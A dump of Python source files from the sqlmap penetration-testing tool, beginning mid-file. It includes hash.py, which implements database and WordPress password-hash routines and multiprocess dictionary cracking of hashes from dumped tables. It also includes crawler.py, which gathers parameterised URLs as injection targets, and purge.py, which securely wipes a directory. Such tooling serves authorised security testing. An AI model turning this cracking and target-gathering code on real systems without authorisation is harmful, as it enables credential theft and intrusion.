uppercase else retVal.lower() def mssql_passwd(password, salt, uppercase=False): """ Reference(s): http://www.leidecker.info/projects/phrasendrescher/mssql.c https://www.evilfingers.com/tools/GSAuditor.php >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False) '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' """ Reference(s): www.exploit-db.com/download_pdf/15537/ http://www.leidecker.info/projects/phrasendrescher/mssql.c https://www.evilfingers.com/tools/GSAuditor.php >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True) '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def mssql_new_passwd(password, salt, uppercase=False): """ Reference(s): http://hashcat.net/forum/thread-1474.html >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' """ binsalt = hexdecode(salt) unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) def oracle_passwd(password, salt, uppercase=True): """ Reference(s): https://www.evilfingers.com/tools/GSAuditor.php http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ http://seclists.org/bugtraq/2007/Sep/304 >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True) 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' """ binsalt = hexdecode(salt) retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) return retVal.upper() if uppercase else retVal.lower() def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' """ Reference(s): http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True) 'F894844C34402B67' """ IV, pad = "\0" * 8, "\0" if isinstance(username, unicode): username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings unistr = "".join("\0%s" % c for c in (username + password).upper()) cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) encrypted = cipher.encrypt(unistr) cipher = des(encrypted[-8:], CBC, IV, pad) encrypted = cipher.encrypt(unistr) retVal = hexencode(encrypted[-8:]) return retVal.upper() if uppercase else retVal.lower() def md5_generic_passwd(password, uppercase=False): """ >>> md5_generic_passwd(password='testpass', uppercase=False) '179ad45c6ce2cb97cf1029e212046e81' """ retVal = md5(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha1_generic_passwd(password, 
uppercase=False): """ >>> sha1_generic_passwd(password='testpass', uppercase=False) '206c80413b9a96c1312cc346b7d2517b84463edd' """ retVal = sha1(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha224_generic_passwd(password, uppercase=False): """ >>> sha224_generic_passwd(password='testpass', uppercase=False) '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' """ retVal = sha224(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha384_generic_passwd(password, uppercase=False): """ >>> sha384_generic_passwd(password='testpass', uppercase=False) '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' """ retVal = sha384(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def sha512_generic_passwd(password, uppercase=False): """ >>> sha512_generic_passwd(password='testpass', uppercase=False) '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' """ retVal = sha512(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() def crypt_generic_passwd(password, salt, uppercase=False): """ Reference(s): http://docs.python.org/library/crypt.html http://helpful.knobs-dials.com/index.php/Hashing_notes http://php.net/manual/en/function.crypt.php http://carey.geek.nz/code/python-fcrypt/ >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False) 'rl.3StKT.4T8M' """ retVal = crypt(password, salt) return retVal.upper() if uppercase else retVal def wordpress_passwd(password, salt, count, prefix, uppercase=False): """ Reference(s): http://packetstormsecurity.org/files/74448/phpassbrute.py.txt http://scriptserver.mainframe8.com/wordpress_password_hasher.php >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' """ def _encode64(input_, count): output = '' i = 0 while i < count: value = ord(input_[i]) i += 1 output = output + ITOA64[value & 0x3f] if i < count: value = value | (ord(input_[i]) << 8) output = output + ITOA64[(value >> 6) & 0x3f] i += 1 if i >= count: break if i < count: value = value | (ord(input_[i]) << 16) output = output + ITOA64[(value >> 12) & 0x3f] i += 1 if i >= count: break output = output + ITOA64[(value >> 18) & 0x3f] return output cipher = md5(salt) cipher.update(password) hash_ = cipher.digest() for i in xrange(count): _ = md5(hash_) _.update(password) hash_ = _.digest() retVal = prefix + _encode64(hash_, 16) return retVal.upper() if uppercase else retVal __functions__ = { HASH.MYSQL: mysql_passwd, HASH.MYSQL_OLD: mysql_old_passwd, HASH.POSTGRES: postgres_passwd, HASH.MSSQL: mssql_passwd, HASH.MSSQL_OLD: mssql_old_passwd, HASH.MSSQL_NEW: mssql_new_passwd, HASH.ORACLE: oracle_passwd, HASH.ORACLE_OLD: oracle_old_passwd, HASH.MD5_GENERIC: md5_generic_passwd, HASH.SHA1_GENERIC: sha1_generic_passwd, HASH.SHA224_GENERIC: sha224_generic_passwd, HASH.SHA384_GENERIC: sha384_generic_passwd, HASH.SHA512_GENERIC: sha512_generic_passwd, HASH.CRYPT_GENERIC: crypt_generic_passwd, HASH.WORDPRESS: wordpress_passwd, } def storeHashesToFile(attack_dict): if not attack_dict: return if kb.storeHashesChoice is None: message = "do you want to store hashes to a temporary file " message += "for eventual further processing with other tools [y/N] " test = readInput(message, default="N") kb.storeHashesChoice = test[0] in ("y", "Y") if not kb.storeHashesChoice: return 
handle, filename = tempfile.mkstemp(prefix="sqlmaphashes-", suffix=".txt") os.close(handle) infoMsg = "writing hashes to a temporary file '%s' " % filename logger.info(infoMsg) items = set() with open(filename, "w+") as f: for user, hashes in attack_dict.items(): for hash_ in hashes: hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if hash_ and hash_ != NULL and hashRecognition(hash_): item = None if user and not user.startswith(DUMMY_USER_PREFIX): item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) else: item = "%s\n" % hash_.encode(UNICODE_ENCODING) if item and item not in items: f.write(item) items.add(item) def attackCachedUsersPasswords(): if kb.data.cachedUsersPasswords: results = dictionaryAttack(kb.data.cachedUsersPasswords) lut = {} for (_, hash_, password) in results: lut[hash_.lower()] = password for user in kb.data.cachedUsersPasswords.keys(): for i in xrange(len(kb.data.cachedUsersPasswords[user])): value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] if value in lut: kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) def attackDumpedTable(): if kb.data.dumpedTable: table = kb.data.dumpedTable columns = table.keys() count = table["__infos__"]["count"] if not count: return infoMsg = "analyzing table dump for possible password hashes" logger.info(infoMsg) found = False col_user = '' col_passwords = set() attack_dict = {} for column in columns: if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break for i in xrange(count): if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: break for column in columns: if column == col_user or column == '__infos__': continue if len(table[column]['values']) <= i: continue value = table[column]['values'][i] if hashRecognition(value): found = True if col_user and i < len(table[col_user]['values']): if table[col_user]['values'][i] not in attack_dict: attack_dict[table[col_user]['values'][i]] = [] attack_dict[table[col_user]['values'][i]].append(value) else: attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] col_passwords.add(column) if attack_dict: infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "") infoMsg += "'%s'" % ", ".join(col for col in col_passwords) logger.info(infoMsg) storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? 
%s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") test = readInput(message, default="N" if conf.multipleTargets else "Y") if test[0] in ("n", "N"): return elif test[0] in ("q", "Q"): raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) lut = dict() for (_, hash_, password) in results: if hash_: lut[hash_.lower()] = password infoMsg = "postprocessing table dump" logger.info(infoMsg) for i in xrange(count): for column in columns: if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i): value = table[column]['values'][i] if value and value.lower() in lut: table[column]['values'][i] += " (%s)" % lut[value.lower()] table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) def hashRecognition(value): retVal = None isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) if isinstance(value, basestring): for name, regex in getPublicTypeMembers(HASH): # Hashes for Oracle and old MySQL look the same hence these checks if isOracle and regex == HASH.MYSQL_OLD: continue elif isMySQL and regex == HASH.ORACLE_OLD: continue elif regex == HASH.CRYPT_GENERIC: if any((value.lower() == value, value.upper() == value)): continue elif re.match(regex, value): retVal = regex break return retVal def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password=word, uppercase=False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). 
" % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1 def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1 def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [] hash_regexes = [] results = [] resumes = [] processException = False user_hash = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) 
user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except SqlmapFilePathException, msg: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % msg logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for 
((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() results.extend(resumes) if len(hash_regexes) == 0: warnMsg = "unknown hash format. " warnMsg += "Please report by e-mail to %s" % ML logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
34,478
Python
.py
716
34.198324
195
0.553875
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
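The hash.py record above ends with sqlmap's WordPress (phpass) routine, which stretches an MD5 of salt+password through `count` extra MD5 rounds and encodes the digest with the phpass base64 alphabet. A minimal Python 3 port is a quick way to see the scheme end to end. This is a sketch, not sqlmap's code: ITOA64 is assumed to be the standard phpass alphabet (sqlmap keeps it in its settings module), and the expected value comes straight from the wordpress_passwd() doctest in the record.

import hashlib

# Assumed: the standard phpass base64 alphabet (ITOA64 in sqlmap's settings).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def encode64(data, count):
    # Byte-for-byte port of _encode64() from the record: 3 input bytes -> 4 chars.
    output, i = "", 0
    while i < count:
        value = data[i]
        i += 1
        output += ITOA64[value & 0x3f]
        if i < count:
            value |= data[i] << 8
        output += ITOA64[(value >> 6) & 0x3f]
        i += 1
        if i >= count:
            break
        if i < count:
            value |= data[i] << 16
        output += ITOA64[(value >> 12) & 0x3f]
        i += 1
        if i >= count:
            break
        output += ITOA64[(value >> 18) & 0x3f]
    return output

def phpass_hash(password, salt, count, prefix):
    pwd = password.encode()
    digest = hashlib.md5(salt.encode() + pwd).digest()
    for _ in range(count):                        # the key-stretching loop
        digest = hashlib.md5(digest + pwd).digest()
    return prefix + encode64(digest, 16)

# Expected value taken from the wordpress_passwd() doctest above.
assert phpass_hash("testpass", "aD9ZLmkp", 2048, "$P$9aD9ZLmkp") == \
    "$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0"

The iteration count travels inside the hash itself: dictionaryAttack() above recovers it as 1 << ITOA64.index(hash[3]), so the '9' in '$P$9...' means 1 << 11 = 2048 rounds.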
18,980
crawler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/crawler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import re import urlparse import time from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import findPageForms from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request.connect import Connect as Request from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup from thirdparty.oset.pyoset import oset def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = oset() def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException, e: errMsg = "connection exception detected (%s). skipping " % e errMsg += "URL '%s'" % current logger.critical(errMsg) except httplib.InvalidURL, e: errMsg = "invalid URL detected (%s). skipping " % e errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, unicode): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') if not tags: tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = urlparse.urljoin(current, href) # flag to know if we are dealing with the same target host _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass finally: if conf.forms: findPageForms(content, current, False, True) if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) infoMsg = "starting crawler" if conf.bulkFile: infoMsg += " for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i>0)) clearConsoleLine(True) if 
threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add((url, None, None, None, None))
5,896
Python
.py
120
32.416667
178
0.527478
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
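crawler.py above expands a frontier of unprocessed URLs one depth level at a time, keeps only links on the target host, and records those carrying GET parameters as usable targets. A single-threaded sketch of that loop, using only the standard library and the same href regex as the record (the target URL and depth are placeholders):

import re
import urllib.parse
import urllib.request

def crawl(target, depth=2):
    visited, usable = set(), set()
    frontier = {target}
    host = urllib.parse.urlparse(target).netloc.split(":")[0]
    for _ in range(depth):
        deeper = set()
        for current in frontier - visited:
            visited.add(current)
            try:
                content = urllib.request.urlopen(current, timeout=10).read().decode("utf-8", "replace")
            except Exception:
                continue  # crawler.py logs and skips connection/URL errors here
            for match in re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content):
                url = urllib.parse.urljoin(current, match.group("href"))
                if urllib.parse.urlparse(url).netloc.split(":")[0] != host:
                    continue  # same-host check, as in crawlThread()
                deeper.add(url)
                if "?" in url:
                    usable.add(url)  # only links with GET parameters become targets
        frontier = deeper
    return usable

The real implementation additionally prefers BeautifulSoup for parsing, honors conf.scope, skips CRAWL_EXCLUDE_EXTENSIONS, and shares the frontier across worker threads.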
18,981
purge.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/purge.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import random import shutil import stat import string from lib.core.data import logger def purge(directory): """ Safely removes content from a given directory """ if not os.path.isdir(directory): warnMsg = "skipping purging of directory '%s' as it does not exist" % directory logger.warn(warnMsg) return infoMsg = "purging content of directory '%s'..." % directory logger.info(infoMsg) filepaths = [] dirpaths = [] for rootpath, directories, filenames in os.walk(directory): dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) logger.debug("changing file attributes") for filepath in filepaths: try: os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) except: pass logger.debug("writing random data to files") for filepath in filepaths: try: filesize = os.path.getsize(filepath) with open(filepath, "w+b") as f: f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) except: pass logger.debug("truncating files") for filepath in filepaths: try: with open(filepath, 'w') as f: pass except: pass logger.debug("renaming filenames to random values") for filepath in filepaths: try: os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) logger.debug("renaming directory names to random values") for dirpath in dirpaths: try: os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass logger.debug("deleting the whole directory tree") os.chdir(os.path.join(directory, "..")) try: shutil.rmtree(directory) except OSError, ex: logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, ex))
2,444
Python
.py
66
29.787879
140
0.641406
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
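purge() above wipes a directory in distinct passes: make files writable, overwrite their contents with random data, truncate them, rename files and directories to random names, then remove the tree. A single-file sketch of the same sequence; it opens with "r+b" so the random bytes land over the existing allocation (the record opens "w+b", which truncates first), and note that on journaling filesystems and SSDs an overwrite is not a hard guarantee anyway:

import os
import random
import stat
import string

def wipe_file(filepath):
    os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE)   # ensure the file is writable
    size = os.path.getsize(filepath)
    with open(filepath, "r+b") as f:
        f.write(os.urandom(size))                      # overwrite existing content
    open(filepath, "w").close()                        # truncate to zero length
    new_name = "".join(random.sample(string.ascii_letters, 8))
    os.rename(filepath, os.path.join(os.path.dirname(filepath), new_name))

One detail worth noticing in the record: directories are renamed deepest-first (the cmp sort on path-separator count), so renaming a parent never invalidates a child path that still has to be touched.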
18,982
pivotdumptable.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/pivotdumptable.py
